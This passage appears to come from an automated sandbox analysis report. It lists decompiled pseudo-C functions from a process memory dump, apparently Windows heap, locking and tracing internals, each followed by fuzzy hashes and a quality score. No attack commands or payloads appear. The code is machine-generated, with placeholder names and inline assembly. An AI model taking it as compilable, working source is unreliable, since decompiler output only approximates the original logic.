            					_t24 = L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
            				}
            				return _t24;
            			}














            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 9f06c06d53b82b73ee354e8d6b8808fadff42ea9b6a5ee7ad44cf5c49193acb7
            • Instruction ID: e4cb6d6e6c5365584ce419b9eb2bb34662492f55ead1b8104a3786d00bf6ac34
            • Opcode Fuzzy Hash: 9f06c06d53b82b73ee354e8d6b8808fadff42ea9b6a5ee7ad44cf5c49193acb7
            • Instruction Fuzzy Hash: 5721A172500604ABDB25DF69D880E6BB7A9EF88740F10056EF50AC7750E734F910CB94
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 93%
            			E0445FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
            				intOrPtr _v8;
            				void* _t19;
            				intOrPtr _t29;
            				intOrPtr _t32;
            				intOrPtr _t35;
            				intOrPtr _t37;
            				intOrPtr* _t40;
            
            				_t35 = __edx;
            				_push(__ecx);
            				_push(__ecx);
            				_t37 = 0;
            				_v8 = __edx;
            				_t29 = __ecx;
            				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
            					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
            					L3:
            					_t19 = _a4 - 4;
            					if(_t19 != 0) {
            						if(_t19 != 1) {
            							L7:
            							return _t37;
            						}
            						if(_t35 == 0) {
            							L11:
            							_t37 = 0xc000000d;
            							goto L7;
            						}
            						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
            							L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
            							_t35 = _v8;
            						}
            						 *((intOrPtr*)(_t40 + 4)) = _t35;
            						goto L7;
            					}
            					if(_t29 == 0) {
            						goto L11;
            					}
            					_t32 =  *_t40;
            					if(_t32 != 0) {
            						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
            						E044376E2( *_t40);
            					}
            					 *_t40 = _t29;
            					goto L7;
            				}
            				_t40 = L04444620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
            				if(_t40 == 0) {
            					_t37 = 0xc0000017;
            					goto L7;
            				}
            				_t35 = _v8;
            				 *_t40 = 0;
            				 *((intOrPtr*)(_t40 + 4)) = 0;
            				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
            				goto L3;
            			}











            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
            • Instruction ID: 6262d1ca5259a8f63cd6deb2e2f2dcd9e8b8e10eafb366cbe64b275e0e627e68
            • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
            • Instruction Fuzzy Hash: D3216A72600640DBEF31CF4AC540A66B7E5EB94B10F24856FE94687B22E730BC09DB81
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 77%
            			E04429240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
            				intOrPtr _t33;
            				intOrPtr _t37;
            				intOrPtr _t41;
            				intOrPtr* _t46;
            				void* _t48;
            				intOrPtr _t50;
            				intOrPtr* _t60;
            				void* _t61;
            				intOrPtr _t62;
            				intOrPtr _t65;
            				void* _t66;
            				void* _t68;
            
            				_push(0xc);
            				_push(0x44ff708);
            				E0447D08C(__ebx, __edi, __esi);
            				_t65 = __ecx;
            				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
            				if( *(__ecx + 0x24) != 0) {
            					_push( *(__ecx + 0x24));
            					E044695D0();
            					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
            				}
            				L6();
            				L6();
            				_push( *((intOrPtr*)(_t65 + 0x28)));
            				E044695D0();
            				_t33 =  *0x45184c4; // 0x0
            				L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
            				_t37 =  *0x45184c4; // 0x0
            				L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
            				_t41 =  *0x45184c4; // 0x0
            				E04442280(L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x45186b4);
            				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
            				_t46 = _t65 + 0xe8;
            				_t62 =  *_t46;
            				_t60 =  *((intOrPtr*)(_t46 + 4));
            				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
            					_t61 = 3;
            					asm("int 0x29");
            					_push(_t65);
            					_t66 = _t61;
            					_t23 = _t66 + 0x14; // 0x8df8084c
            					_push( *_t23);
            					E044695D0();
            					_t24 = _t66 + 0x10; // 0x89e04d8b
            					_push( *_t24);
            					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
            					_t48 = E044695D0();
            					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
            					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
            					return _t48;
            				} else {
            					 *_t60 = _t62;
            					 *((intOrPtr*)(_t62 + 4)) = _t60;
            					 *(_t68 - 4) = 0xfffffffe;
            					E04429325();
            					_t50 =  *0x45184c4; // 0x0
            					return E0447D0D1(L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
            				}
            			}
















            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: dc4aa8a4a5a3bb012ea9c30b1e820208d06fbd5cf94b2ae9ddddcbe9120bb237
            • Instruction ID: 8f9ee9c2bcc2bb419000cbb3e24bd6ed9571e68bd180c7aedbae8df534934bde
            • Opcode Fuzzy Hash: dc4aa8a4a5a3bb012ea9c30b1e820208d06fbd5cf94b2ae9ddddcbe9120bb237
            • Instruction Fuzzy Hash: F3215C72540600DFDB21EF29CA40F56B7B9FF08708F54496EE10A866B2CB74F945DB44
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 54%
            			E0445B390(void* __ecx, intOrPtr _a4) {
            				signed int _v8;
            				signed char _t12;
            				signed int _t16;
            				signed int _t21;
            				void* _t28;
            				signed int _t30;
            				signed int _t36;
            				signed int _t41;
            
            				_push(__ecx);
            				_t41 = _a4 + 0xffffffb8;
            				E04442280(_t12, 0x4518608);
            				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
            				asm("sbb edi, edi");
            				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
            				_v8 = _t36;
            				asm("lock cmpxchg [ebx], ecx");
            				_t30 = 1;
            				if(1 != 1) {
            					while(1) {
            						_t21 = _t30 & 0x00000006;
            						_t16 = _t30;
            						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
            						asm("lock cmpxchg [edi], esi");
            						if(_t16 == _t30) {
            							break;
            						}
            						_t30 = _t16;
            					}
            					_t36 = _v8;
            					if(_t21 == 2) {
            						_t16 = E044600C2(0x4518608, 0, _t28);
            					}
            				}
            				if(_t36 != 0) {
            					_t16 = L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
            				}
            				return _t16;
            			}












            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 7f719e24059dd486987f22a6e20e0a1e21129af11d0a853c7b87672ceb018112
            • Instruction ID: a0091b5dfe26a889cb60e58036571818775163da771596fd4406ab6577bc4bbc
            • Opcode Fuzzy Hash: 7f719e24059dd486987f22a6e20e0a1e21129af11d0a853c7b87672ceb018112
            • Instruction Fuzzy Hash: 091144333011109FEF399A158D81A2B7796FBC5370B28012EED16E73A1DD31BC02D690
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 93%
            			E044A46A7(signed short* __ecx, unsigned int __edx, char* _a4) {
            				signed short* _v8;
            				unsigned int _v12;
            				intOrPtr _v16;
            				signed int _t22;
            				signed char _t23;
            				short _t32;
            				void* _t38;
            				char* _t40;
            
            				_v12 = __edx;
            				_t29 = 0;
            				_v8 = __ecx;
            				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
            				_t38 = L04444620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
            				if(_t38 != 0) {
            					_t40 = _a4;
            					 *_t40 = 1;
            					E0446F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
            					_t22 = _v12 >> 1;
            					_t32 = 0x2e;
            					 *((short*)(_t38 + _t22 * 2)) = _t32;
            					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
            					_t23 = E0445D268(_t38, 1);
            					asm("sbb al, al");
            					 *_t40 =  ~_t23 + 1;
            					L044477F0(_v16, 0, _t38);
            				} else {
            					 *_a4 = 0;
            					_t29 = 0xc0000017;
            				}
            				return _t29;
            			}












            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
            • Instruction ID: 0185384bd332ca12b91d144f2053df26a9b6e3a652b90120692732c8e8dcdfa5
            • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
            • Instruction Fuzzy Hash: 06112572904208BBDB019F5DE8808BEF7B9EF95304F10806EF984CB351DA31AD55D7A5
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 94%
            			E0443766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
            				char _v8;
            				void* _t22;
            				void* _t24;
            				intOrPtr _t29;
            				intOrPtr* _t30;
            				void* _t42;
            				intOrPtr _t47;
            
            				_push(__ecx);
            				_t36 =  &_v8;
            				if(E0445F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
            					L10:
            					_t22 = 0;
            				} else {
            					_t24 = _v8 + __ecx;
            					_t42 = _t24;
            					if(_t24 < __ecx) {
            						goto L10;
            					} else {
            						if(E0445F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
            							goto L10;
            						} else {
            							_t29 = _v8 + _t42;
            							if(_t29 < _t42) {
            								goto L10;
            							} else {
            								_t47 = _t29;
            								_t30 = _a16;
            								if(_t30 != 0) {
            									 *_t30 = _t47;
            								}
            								if(_t47 == 0) {
            									goto L10;
            								} else {
            									_t22 = L04444620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
            								}
            							}
            						}
            					}
            				}
            				return _t22;
            			}











            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
            • Instruction ID: fd167174fd45a32bc22468bfa27d4685d4a768f7e39ead2781efd8a0edf513db
            • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
            • Instruction Fuzzy Hash: A4018872700119AFDF20AE5ECD55E5B77ADEB88B71B148526B948CB291DA30ED0187A0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 46%
            			E044BC450(intOrPtr* _a4) {
            				signed char _t25;
            				intOrPtr* _t26;
            				intOrPtr* _t27;
            
            				_t26 = _a4;
            				_t25 =  *(_t26 + 0x10);
            				if((_t25 & 0x00000003) != 1) {
            					_push(0);
            					_push(0);
            					_push(0);
            					_push( *((intOrPtr*)(_t26 + 8)));
            					_push(0);
            					_push( *_t26);
            					E04469910();
            					_t25 =  *(_t26 + 0x10);
            				}
            				if((_t25 & 0x00000001) != 0) {
            					_push(4);
            					_t7 = _t26 + 4; // 0x4
            					_t27 = _t7;
            					_push(_t27);
            					_push(5);
            					_push(0xfffffffe);
            					E044695B0();
            					if( *_t27 != 0) {
            						_push( *_t27);
            						E044695D0();
            					}
            				}
            				_t8 = _t26 + 0x14; // 0x14
            				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
            					L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
            				}
            				_push( *_t26);
            				E044695D0();
            				return L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
            			}







            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
            • Instruction ID: 2fe817332c3fb5c89868a5299e76d1c487ef7d87520d728187938338b7f3b95b
            • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
            • Instruction Fuzzy Hash: B60180B2140505BFEB21AF66CCC1EA3BB6EFB54394F00452BF25442661CB71BCA1CAB1
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 69%
            			E04429080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
            				intOrPtr* _t51;
            				intOrPtr _t59;
            				signed int _t64;
            				signed int _t67;
            				signed int* _t71;
            				signed int _t74;
            				signed int _t77;
            				signed int _t82;
            				intOrPtr* _t84;
            				void* _t85;
            				intOrPtr* _t87;
            				void* _t94;
            				signed int _t95;
            				intOrPtr* _t97;
            				signed int _t99;
            				signed int _t102;
            				void* _t104;
            
            				_push(__ebx);
            				_push(__esi);
            				_push(__edi);
            				_t97 = __ecx;
            				_t102 =  *(__ecx + 0x14);
            				if((_t102 & 0x02ffffff) == 0x2000000) {
            					_t102 = _t102 | 0x000007d0;
            				}
            				_t48 =  *[fs:0x30];
            				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
            					_t102 = _t102 & 0xff000000;
            				}
            				_t80 = 0x45185ec;
            				E04442280(_t48, 0x45185ec);
            				_t51 =  *_t97 + 8;
            				if( *_t51 != 0) {
            					L6:
            					return E0443FFB0(_t80, _t97, _t80);
            				} else {
            					 *(_t97 + 0x14) = _t102;
            					_t84 =  *0x451538c; // 0x776f68c8
            					if( *_t84 != 0x4515388) {
            						_t85 = 3;
            						asm("int 0x29");
            						asm("int3");
            						asm("int3");
            						asm("int3");
            						asm("int3");
            						asm("int3");
            						asm("int3");
            						asm("int3");
            						asm("int3");
            						asm("int3");
            						asm("int3");
            						asm("int3");
            						asm("int3");
            						_push(0x2c);
            						_push(0x44ff6e8);
            						E0447D0E8(0x45185ec, _t97, _t102);
            						 *((char*)(_t104 - 0x1d)) = 0;
            						_t99 =  *(_t104 + 8);
            						__eflags = _t99;
            						if(_t99 == 0) {
            							L13:
            							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
            							if(__eflags == 0) {
            								E044F88F5(_t80, _t85, 0x4515388, _t99, _t102, __eflags);
            							}
            						} else {
            							__eflags = _t99 -  *0x45186c0; // 0x1707b0
            							if(__eflags == 0) {
            								goto L13;
            							} else {
            								__eflags = _t99 -  *0x45186b8; // 0x0
            								if(__eflags == 0) {
            									goto L13;
            								} else {
            									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
            									__eflags =  *((char*)(_t59 + 0x28));
            									if( *((char*)(_t59 + 0x28)) == 0) {
            										E04442280(_t99 + 0xe0, _t99 + 0xe0);
            										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
            										__eflags =  *((char*)(_t99 + 0xe5));
            										if(__eflags != 0) {
            											E044F88F5(0x45185ec, _t85, 0x4515388, _t99, _t102, __eflags);
            										} else {
            											__eflags =  *((char*)(_t99 + 0xe4));
            											if( *((char*)(_t99 + 0xe4)) == 0) {
            												 *((char*)(_t99 + 0xe4)) = 1;
            												_push(_t99);
            												_push( *((intOrPtr*)(_t99 + 0x24)));
            												E0446AFD0();
            											}
            											while(1) {
            												_t71 = _t99 + 8;
            												 *(_t104 - 0x2c) = _t71;
            												_t80 =  *_t71;
            												_t95 = _t71[1];
            												 *(_t104 - 0x28) = _t80;
            												 *(_t104 - 0x24) = _t95;
            												while(1) {
            													L19:
            													__eflags = _t95;
            													if(_t95 == 0) {
            														break;
            													}
            													_t102 = _t80;
            													 *(_t104 - 0x30) = _t95;
            													 *(_t104 - 0x24) = _t95 - 1;
            													asm("lock cmpxchg8b [edi]");
            													_t80 = _t102;
            													 *(_t104 - 0x28) = _t80;
            													 *(_t104 - 0x24) = _t95;
            													__eflags = _t80 - _t102;
            													_t99 =  *(_t104 + 8);
            													if(_t80 != _t102) {
            														continue;
            													} else {
            														__eflags = _t95 -  *(_t104 - 0x30);
            														if(_t95 !=  *(_t104 - 0x30)) {
            															continue;
            														} else {
            															__eflags = _t95;
            															if(_t95 != 0) {
            																_t74 = 0;
            																 *(_t104 - 0x34) = 0;
            																_t102 = 0;
            																__eflags = 0;
            																while(1) {
            																	 *(_t104 - 0x3c) = _t102;
            																	__eflags = _t102 - 3;
            																	if(_t102 >= 3) {
            																		break;
            																	}
            																	__eflags = _t74;
            																	if(_t74 != 0) {
            																		L49:
            																		_t102 =  *_t74;
            																		__eflags = _t102;
            																		if(_t102 != 0) {
            																			_t102 =  *(_t102 + 4);
            																			__eflags = _t102;
            																			if(_t102 != 0) {
            																				 *0x451b1e0(_t74, _t99);
            																				 *_t102();
            																			}
            																		}
            																		do {
            																			_t71 = _t99 + 8;
            																			 *(_t104 - 0x2c) = _t71;
            																			_t80 =  *_t71;
            																			_t95 = _t71[1];
            																			 *(_t104 - 0x28) = _t80;
            																			 *(_t104 - 0x24) = _t95;
            																			goto L19;
            																		} while (_t74 == 0);
            																		goto L49;
            																	} else {
            																		_t82 = 0;
            																		__eflags = 0;
            																		while(1) {
            																			 *(_t104 - 0x38) = _t82;
            																			__eflags = _t82 -  *0x45184c0;
            																			if(_t82 >=  *0x45184c0) {
            																				break;
            																			}
            																			__eflags = _t74;
            																			if(_t74 == 0) {
            																				_t77 = E044F9063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
            																				__eflags = _t77;
            																				if(_t77 == 0) {
            																					_t74 = 0;
            																					__eflags = 0;
            																				} else {
            																					_t74 = _t77 + 0xfffffff4;
            																				}
            																				 *(_t104 - 0x34) = _t74;
            																				_t82 = _t82 + 1;
            																				continue;
            																			}
            																			break;
            																		}
            																		_t102 = _t102 + 1;
            																		continue;
            																	}
            																	goto L20;
            																}
            																__eflags = _t74;
            															}
            														}
            													}
            													break;
            												}
            												L20:
            												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
            												 *((char*)(_t99 + 0xe5)) = 1;
            												 *((char*)(_t104 - 0x1d)) = 1;
            												goto L21;
            											}
            										}
            										L21:
            										 *(_t104 - 4) = 0xfffffffe;
            										E0442922A(_t99);
            										_t64 = E04447D50();
            										__eflags = _t64;
            										if(_t64 != 0) {
            											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
            										} else {
            											_t67 = 0x7ffe0386;
            										}
            										__eflags =  *_t67;
            										if( *_t67 != 0) {
            											_t67 = E044F8B58(_t99);
            										}
            										__eflags =  *((char*)(_t104 - 0x1d));
            										if( *((char*)(_t104 - 0x1d)) != 0) {
            											__eflags = _t99 -  *0x45186c0; // 0x1707b0
            											if(__eflags != 0) {
            												__eflags = _t99 -  *0x45186b8; // 0x0
            												if(__eflags == 0) {
            													_t94 = 0x45186bc;
            													_t87 = 0x45186b8;
            													goto L27;
            												} else {
            													__eflags = _t67 | 0xffffffff;
            													asm("lock xadd [edi], eax");
            													if(__eflags == 0) {
            														E04429240(_t80, _t99, _t99, _t102, __eflags);
            													}
            												}
            											} else {
            												_t94 = 0x45186c4;
            												_t87 = 0x45186c0;
            												L27:
            												E04459B82(_t80, _t87, _t94, _t99, _t102, __eflags);
            											}
            										}
            									} else {
            										goto L13;
            									}
            								}
            							}
            						}
            						return E0447D130(_t80, _t99, _t102);
            					} else {
            						 *_t51 = 0x4515388;
            						 *((intOrPtr*)(_t51 + 4)) = _t84;
            						 *_t84 = _t51;
            						 *0x451538c = _t51;
            						goto L6;
            					}
            				}
            			}





















            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • Opcode ID: 982607fecb3a12731cb923521be55062e0b1e40c43e09d70c163f6d0c3897007
            • Instruction ID: d249a19364c6bd65fd5197fe9397c2bcf60477f1343550731493cf9effd4e936
            • Opcode Fuzzy Hash: 982607fecb3a12731cb923521be55062e0b1e40c43e09d70c163f6d0c3897007
            • Instruction Fuzzy Hash: 2A01F4B26016189FEB249F05D940B12B7E9FF85724F65416BE6019B7A1D374FC41CBA0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 86%
            			E044F4015(signed int __eax, signed int __ecx) {
            				void* __ebx;
            				void* __edi;
            				signed char _t10;
            				signed int _t28;
            
            				_push(__ecx);
            				_t28 = __ecx;
            				asm("lock xadd [edi+0x24], eax");
            				_t10 = (__eax | 0xffffffff) - 1;
            				if(_t10 == 0) {
            					_t1 = _t28 + 0x1c; // 0x1e
            					E04442280(_t10, _t1);
            					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
            					E04442280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x45186ac);
            					E0442F900(0x45186d4, _t28);
            					E0443FFB0(0x45186ac, _t28, 0x45186ac);
            					 *((intOrPtr*)(_t28 + 0x20)) = 0;
            					E0443FFB0(0, _t28, _t1);
            					_t18 =  *((intOrPtr*)(_t28 + 0x94));
            					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
            						L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
            					}
            					_t10 = L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
            				}
            				return _t10;
            			}








            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • Opcode ID: f74a63f3bb9bca4ab112eabb4ddd3b235354b1ddabfc42e4e992d9b2d8e3b4cb
            • Instruction ID: fc38db87d5296e9b9b2e5a57e0e5313cc2ebc519712e8073c950ea8d977e50e4
            • Opcode Fuzzy Hash: f74a63f3bb9bca4ab112eabb4ddd3b235354b1ddabfc42e4e992d9b2d8e3b4cb
            • Instruction Fuzzy Hash: 520188716019457FFA11AB6ACD80E13B7ACFB85754B00061BF60883A22CB24FC11C6E4
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 61%
            			E044E14FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
            				signed int _v8;
            				intOrPtr _v16;
            				intOrPtr _v20;
            				intOrPtr _v24;
            				intOrPtr _v28;
            				short _v54;
            				char _v60;
            				void* __edi;
            				void* __esi;
            				signed char* _t21;
            				intOrPtr _t27;
            				intOrPtr _t33;
            				intOrPtr _t34;
            				signed int _t35;
            
            				_t32 = __edx;
            				_t27 = __ebx;
            				_v8 =  *0x451d360 ^ _t35;
            				_t33 = __edx;
            				_t34 = __ecx;
            				E0446FA60( &_v60, 0, 0x30);
            				_v20 = _a4;
            				_v16 = _a8;
            				_v28 = _t34;
            				_v24 = _t33;
            				_v54 = 0x1034;
            				if(E04447D50() == 0) {
            					_t21 = 0x7ffe0388;
            				} else {
            					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
            				}
            				_push( &_v60);
            				_push(0x10);
            				_push(0x20402);
            				_push( *_t21 & 0x000000ff);
            				return E0446B640(E04469AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
            			}


















            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • Opcode ID: 6852f6253bfd213335aafdc5f1a898e165d2218df0e6b3a71096e446479e3888
            • Instruction ID: 499312e82bbfbf5254b6fe4bfdf8c713ba602e4446f214e1f8e6cfeb19798278
            • Opcode Fuzzy Hash: 6852f6253bfd213335aafdc5f1a898e165d2218df0e6b3a71096e446479e3888
            • Instruction Fuzzy Hash: B5018071A00258ABDF10DF69D841EAEB7B8EF44700F40405BB905EB281DA74EA05CB95
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 61%
            			E044E138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
            				signed int _v8;
            				intOrPtr _v16;
            				intOrPtr _v20;
            				intOrPtr _v24;
            				intOrPtr _v28;
            				short _v54;
            				char _v60;
            				void* __edi;
            				void* __esi;
            				signed char* _t21;
            				intOrPtr _t27;
            				intOrPtr _t33;
            				intOrPtr _t34;
            				signed int _t35;
            
            				_t32 = __edx;
            				_t27 = __ebx;
            				_v8 =  *0x451d360 ^ _t35;
            				_t33 = __edx;
            				_t34 = __ecx;
            				E0446FA60( &_v60, 0, 0x30);
            				_v20 = _a4;
            				_v16 = _a8;
            				_v28 = _t34;
            				_v24 = _t33;
            				_v54 = 0x1033;
            				if(E04447D50() == 0) {
            					_t21 = 0x7ffe0388;
            				} else {
            					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
            				}
            				_push( &_v60);
            				_push(0x10);
            				_push(0x20402);
            				_push( *_t21 & 0x000000ff);
            				return E0446B640(E04469AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
            			}


















            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • Opcode ID: 14c4f0f6fba646e2e65627537c12b6ccbde66f3057c20a2c1c56816ae273d3a3
            • Instruction ID: ff83d830fe0f9de4b9a6943e80ff154f75b379276a64f52b04f988d1d0677d4d
            • Opcode Fuzzy Hash: 14c4f0f6fba646e2e65627537c12b6ccbde66f3057c20a2c1c56816ae273d3a3
            • Instruction Fuzzy Hash: AA015271A00358AFDF14DFA9D881EAEB7B8EF44710F00405BB905EB381DA74AA05C795
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E044F1074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
            				char _v8;
            				void* _v11;
            				unsigned int _v12;
            				void* _v15;
            				void* __esi;
            				void* __ebp;
            				char* _t16;
            				signed int* _t35;
            
            				_t22 = __ebx;
            				_t35 = __ecx;
            				_v8 = __edx;
            				_t13 =  !( *__ecx) + 1;
            				_v12 =  !( *__ecx) + 1;
            				if(_a4 != 0) {
            					E044F165E(__ebx, 0x4518ae4, (__edx -  *0x4518b04 >> 0x14) + (__edx -  *0x4518b04 >> 0x14), __edi, __ecx, (__edx -  *0x4518b04 >> 0x14) + (__edx -  *0x4518b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
            				}
